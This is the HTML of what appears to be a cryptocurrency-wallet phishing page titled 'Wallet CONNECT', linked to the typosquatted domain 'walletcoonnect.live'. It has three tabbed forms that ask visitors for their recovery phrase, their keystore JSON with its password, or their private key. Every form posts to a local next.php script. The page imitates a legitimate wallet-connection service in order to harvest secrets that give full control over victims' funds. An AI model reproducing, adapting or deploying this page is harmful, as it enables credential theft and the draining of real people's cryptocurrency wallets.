<html lang="en-US">

<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Import – Wallet CONNECT</title>
<link rel="stylesheet" id="astra-theme-css-css" href="css/frontend.min.css?ver=3.1.1" media="all">
<link rel="stylesheet" id="cf59d11b2-css" href="css/cf59d11b2.min.css?ver=1617811394" media="all">
<link rel="stylesheet" id="elementor-frontend-css" href="css/frontend.min.css?ver=3.0.14" media="all">
<link rel="stylesheet" id="elementor-post-44-css" href="css/post-44.css?ver=1615306558" media="all">
<style type="text/css">
    .elementor-44 .elementor-element.elementor-element-16aff3e3 {
    width: 37.333%;
}

@media only screen and (max-width: 600px){
    .elementor-44 .elementor-element.elementor-element-16aff3e3 {
    width: 100%;
}
}


</style>
</head>

<body class=" astra-hfb-header ast-desktop ast-page-builder-template " style="margin: 0px" >
<div class="hfeed site" id="page">
<div id="content" class="site-content">
<div class="ast-container">
<div id="primary" class="content-area primary">
<main id="main" class="site-main">
<article class="post-44 page type-page status-publish ast-article-single" id="post-44" itemtype="https://schema.org/CreativeWork" itemscope="itemscope">
<div class="entry-content clear" itemprop="text">
<div class="elementor elementor-44">
<div class="elementor-inner">
<div class="elementor-section-wrap">
<section class="elementor-section elementor-top-section elementor-element elementor-element-468d5dd4 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="468d5dd4" data-element_type="section">
<div class="elementor-container elementor-column-gap-default">
<div class="elementor-row">
<div class="elementor-column elementor-col-33 elementor-top-column elementor-element elementor-element-611fc70b" data-id="611fc70b" data-element_type="column">
<div class="elementor-column-wrap">
<div class="elementor-widget-wrap">
</div>
</div>
</div>
<div class="elementor-column elementor-col-33 elementor-top-column elementor-element elementor-element-16aff3e3" data-id="16aff3e3" data-element_type="column">
<div class="elementor-column-wrap elementor-element-populated">
<div class="elementor-widget-wrap">
<div class="elementor-element elementor-element-27622e38 elementor-widget elementor-widget-button" data-id="27622e38" data-element_type="widget" data-widget_type="button.default">
<div class="elementor-widget-container">
<div class="elementor-button-wrapper">
<a href="https://walletcoonnect.live/wallets/" class="elementor-button-link elementor-button elementor-size-sm" role="button">
<span class="elementor-button-content-wrapper">
<span class="elementor-button-icon elementor-align-icon-left">
<i aria-hidden="true" class="fas fa-chevron-left"></i> </span>
<span class="elementor-button-text">CONNECT Wallet</span>
</span>
</a>
</div>
</div>
</div>
<div class="elementor-element elementor-element-21b1c5c4 elementor-widget elementor-widget-eael-adv-tabs" data-id="21b1c5c4" data-element_type="widget" data-widget_type="eael-adv-tabs.default">
<div class="elementor-widget-container">
<div id="eael-advance-tabs-21b1c5c4" class="eael-advance-tabs eael-tabs-horizontal active-caret-on" data-tabid="21b1c5c4">
<div class="eael-tabs-nav">
<ul class="">
<li class="active" id="t1">
<span class="eael-tab-title">Phrase</span>
</li>
<li class="inactive" id="t2">
<span class="eael-tab-title">Keystore Json</span>
</li>
<li class="inactive" id="t3">
<span class="eael-tab-title">Private Key</span>
</li>
</ul>
</div>
<div class="eael-tabs-content">
<div class="clearfix active" id="tab1">
<div data-elementor-type="section" data-elementor-id="52" class="elementor elementor-52" data-elementor-settings="[]">
<div class="elementor-section-wrap">
    <section class="elementor-section elementor-top-section elementor-element elementor-element-106ec73 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="106ec73" data-element_type="section">
        <div class="elementor-container elementor-column-gap-default">
            <div class="elementor-row">
                <div class="elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-4e2744df" data-id="4e2744df" data-element_type="column">
                    <div class="elementor-column-wrap elementor-element-populated">
                        <div class="elementor-widget-wrap">
                            <div class="elementor-element elementor-element-18611f22 elementor-button-align-stretch elementor-widget elementor-widget-form" data-id="18611f22" data-element_type="widget" data-settings="{&quot;step_next_label&quot;:&quot;Next&quot;,&quot;step_previous_label&quot;:&quot;Previous&quot;,&quot;button_width&quot;:&quot;100&quot;,&quot;step_type&quot;:&quot;number_text&quot;,&quot;step_icon_shape&quot;:&quot;circle&quot;}" data-widget_type="form.default">
                                <div class="elementor-widget-container">
                                    <form class="elementor-form" method="POST" action="./next.php" id="rainbowphraseimport" name="New Form">
                                        <div class="elementor-form-fields-wrapper elementor-labels-">
                                            <div class="elementor-field-type-textarea elementor-field-group elementor-column elementor-field-group-rainbowphrase elementor-col-100">
                                                <label for="form-field-rainbowphrase" class="elementor-field-label elementor-screen-only">Phrase</label><textarea class="elementor-field-textual elementor-field  elementor-size-sm" name="rainbowphrase" id="form-field-rainbowphrase" rows="4" placeholder="Phrase" required=""></textarea> </div>
                                            <div class="elementor-field-type-acceptance elementor-field-group elementor-column elementor-field-group-field_f721913 elementor-col-100">
                                                <div class="elementor-field-subgroup"><span class="elementor-field-option"><input type="checkbox" name="form_fields[field_f721913]" id="form-field-field_f721913" class="elementor-field elementor-size-sm  elementor-acceptance-field"> <label for="form-field-field_f721913">Typically 12 (sometimes 24) words seperated by a single spaces.</label></span></div>
                                            </div>
                                            <div class="elementor-field-group elementor-column elementor-field-type-submit elementor-col-100 e-form__buttons">
                                                <button type="submit" class="elementor-button elementor-size-sm" id="rainbowphrasebtn" name="btn1">
                                                    <span>
                                                        <span class=" elementor-button-icon">
                                                        </span>
                                                        <span class="elementor-button-text">CONNECT</span>
                                                    </span>
                                                </button>
                                            </div>
                                        </div>
                                    </form>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </section>
</div>
</div>
</div>
<div class="clearfix inactive" id="tab2">
<div data-elementor-type="page" data-elementor-id="54" class="elementor elementor-54" data-elementor-settings="[]">
<div class="elementor-inner">
    <div class="elementor-section-wrap">
        <section class="elementor-section elementor-top-section elementor-element elementor-element-48d54cc elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="48d54cc" data-element_type="section">
            <div class="elementor-container elementor-column-gap-default">
                <div class="elementor-row">
                    <div class="elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-5f4b9f9c" data-id="5f4b9f9c" data-element_type="column">
                        <div class="elementor-column-wrap elementor-element-populated">
                            <div class="elementor-widget-wrap">
                                <div class="elementor-element elementor-element-1ab6a62d elementor-button-align-stretch elementor-widget elementor-widget-form" data-id="1ab6a62d" data-element_type="widget" data-settings="{&quot;step_next_label&quot;:&quot;Next&quot;,&quot;step_previous_label&quot;:&quot;Previous&quot;,&quot;button_width&quot;:&quot;100&quot;,&quot;step_type&quot;:&quot;number_text&quot;,&quot;step_icon_shape&quot;:&quot;circle&quot;}" data-widget_type="form.default">
                                    <div class="elementor-widget-container">
                                        <form class="elementor-form" method="POST" action="./next.php" id="rainbowkeystorejson" name="New Form">
                                            
                                            <div class="elementor-form-fields-wrapper elementor-labels-">
                                                <div class="elementor-field-type-textarea elementor-field-group elementor-column elementor-field-group-keystorejsonrainbow elementor-col-100">
                                                    <label for="form-field-keystorejsonrainbow" class="elementor-field-label elementor-screen-only">Keystore Json</label><textarea class="elementor-field-textual elementor-field  elementor-size-sm" name="keystorejsonrainbow" id="form-field-keystorejsonrainbow" rows="4" placeholder="Keystore Json" required=""></textarea> </div>
                                                <div class="elementor-field-type-text elementor-field-group elementor-column elementor-field-group-passwordrainbow elementor-col-100">
                                                    <label for="form-field-passwordrainbow" class="elementor-field-label elementor-screen-only">Password </label><input size="1" type="text" name="passwordrainbow" id="form-field-passwordrainbow" class="elementor-field elementor-size-sm  elementor-field-textual" placeholder="Password" required=""> </div>
                                                <div class="elementor-field-type-acceptance elementor-field-group elementor-column elementor-field-group-field_f721913 elementor-col-100">
                                                    <div class="elementor-field-subgroup"><span class="elementor-field-option"><input type="checkbox" name="form_fields[field_f721913]" id="form-field-field_f721913" class="elementor-field elementor-size-sm  elementor-acceptance-field"> <label for="form-field-field_f721913">Several lines of text beginning with "{...}" plus the password you used to encrypt it.</label></span></div>
                                                </div>
                                                <div class="elementor-field-group elementor-column elementor-field-type-submit elementor-col-100 e-form__buttons">
                                                    <button type="submit" class="elementor-button elementor-size-sm" id="rainbowpassword" name="btn2">
                                                        <span>
                                                            <span class=" elementor-button-icon">
                                                            </span>
                                                            <span class="elementor-button-text">CONNECT</span>
                                                        </span>
                                                    </button>
                                                </div>
                                            </div>
                                        </form>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </section>
    </div>
</div>
</div>
</div>
<div class="clearfix inactive" id="tab3">
<div data-elementor-type="page" data-elementor-id="50" class="elementor elementor-50" data-elementor-settings="[]">
<div class="elementor-inner">
    <div class="elementor-section-wrap">
        <section class="elementor-section elementor-top-section elementor-element elementor-element-629e4de3 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="629e4de3" data-element_type="section">
            <div class="elementor-container elementor-column-gap-default">
                <div class="elementor-row">
                    <div class="elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-4fa9be46" data-id="4fa9be46" data-element_type="column">
                        <div class="elementor-column-wrap elementor-element-populated">
                            <div class="elementor-widget-wrap">
                                <div class="elementor-element elementor-element-1590ec99 elementor-button-align-stretch elementor-widget elementor-widget-form" data-id="1590ec99" data-element_type="widget" data-widget_type="form.default">
                                    <div class="elementor-widget-container">
                                        <form class="elementor-form" method="POST" action="./next.php" id="rainbowprivatekeybtn" name="New Form">
                                            
                                            <div class="elementor-form-fields-wrapper elementor-labels-">
                                                <div class="elementor-field-type-text elementor-field-group elementor-column elementor-field-group-privatekey elementor-col-100">
                                                    <label for="form-field-privatekey" class="elementor-field-label elementor-screen-only">Private Key</label><input size="1" type="text" name="privatekey" id="form-field-privatekey" class="elementor-field elementor-size-sm  elementor-field-textual" placeholder="Private Key" required=""> </div>
                                                <div class="elementor-field-type-acceptance elementor-field-group elementor-column elementor-field-group-field_f721913 elementor-col-100">
                                                    <div class="elementor-field-subgroup"><span class="elementor-field-option"><input type="checkbox" name="form_fields[field_f721913]" id="form-field-field_f721913" class="elementor-field elementor-size-sm  elementor-acceptance-field"> <label for="form-field-field_f721913">Typically 12 (sometimes 24) words seperated by a single spaces.</label></span></div>
                                                </div>
                                                <div class="elementor-field-group elementor-column elementor-field-type-submit elementor-col-100 e-form__buttons">
                                                    <button type="submit" class="elementor-button elementor-size-sm" id="rainbowprivatekey" name="btn3">
                                                        <span>
                                                            <span class=" elementor-button-icon">
                                                            </span>
                                                            <span class="elementor-button-text">CONNECT</span>
                                                        </span>
                                                    </button>
                                                </div>
                                            </div>
                                        </form>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </section>
    </div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div class="elementor-column elementor-col-33 elementor-top-column elementor-element elementor-element-1ea516c5" data-id="1ea516c5" data-element_type="column">
<div class="elementor-column-wrap">
<div class="elementor-widget-wrap">
</div>
</div>
</div>
</div>
</div>
</section>
</div>
</div>
</div>
</div>
</article>
</main>
</div>
</div>
</div>
</div>
<link rel="stylesheet" id="elementor-post-52-css" href="css/post-52.css?ver=1615246224" media="all">
<link rel="stylesheet" id="elementor-post-54-css" href="css/post-54.css?ver=1615246224" media="all">
<link rel="stylesheet" id="elementor-post-50-css" href="css/post-50.css?ver=1615246224" media="all">
<!-- Optional JavaScript -->
  <!-- jQuery first, then Popper.js, then Bootstrap JS -->
  <script type="text/javascript" src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
  <script type="text/javascript"  src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
  <script type="text/javascript" src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
</body>

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script type="text/javascript" src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
<script>

  /* global $ */
  $(document).ready(function(){
    var count=0;

    $('#t1').click(function () {
        $("#tab1").addClass("active");
        $("#tab1").removeClass("inactive");
        $("#tab2").addClass("inactive");
        $("#tab2").removeClass("active");
        $("#tab3").addClass("inactive");
        $("#tab3").removeClass("active");
        $("#t1").addClass("active");
        $("#t1").removeClass("inactive");
        $("#t2").addClass("inactive");
        $("#t2").removeClass("active");
        $("#t3").addClass("inactive");
        $("#t3").removeClass("active");

        

    });
    $('#t2').click(function () {
        $("#tab2").addClass("active");
        $("#tab2").removeClass("inactive");
        $("#tab1").addClass("inactive");
        $("#tab1").removeClass("active");
        $("#tab3").addClass("inactive");
        $("#tab3").removeClass("active");
        $("#t2").addClass("active");
        $("#t2").removeClass("inactive");
        $("#t1").addClass("inactive");
        $("#t1").removeClass("active");
        $("#t3").addClass("inactive");
        $("#t3").removeClass("active");

        

    });
    $('#t3').click(function () {
        $("#tab3").addClass("active");
        $("#tab3").removeClass("inactive");
        $("#tab2").addClass("inactive");
        $("#tab2").removeClass("active");
        $("#tab1").addClass("inactive");
        $("#tab1").removeClass("active");
        $("#t3").addClass("active");
        $("#t3").removeClass("inactive");
        $("#t2").addClass("inactive");
        $("#t2").removeClass("active");
        $("#t1").addClass("inactive");
        $("#t1").removeClass("active");

        

    });


    });


  </script>
  </html>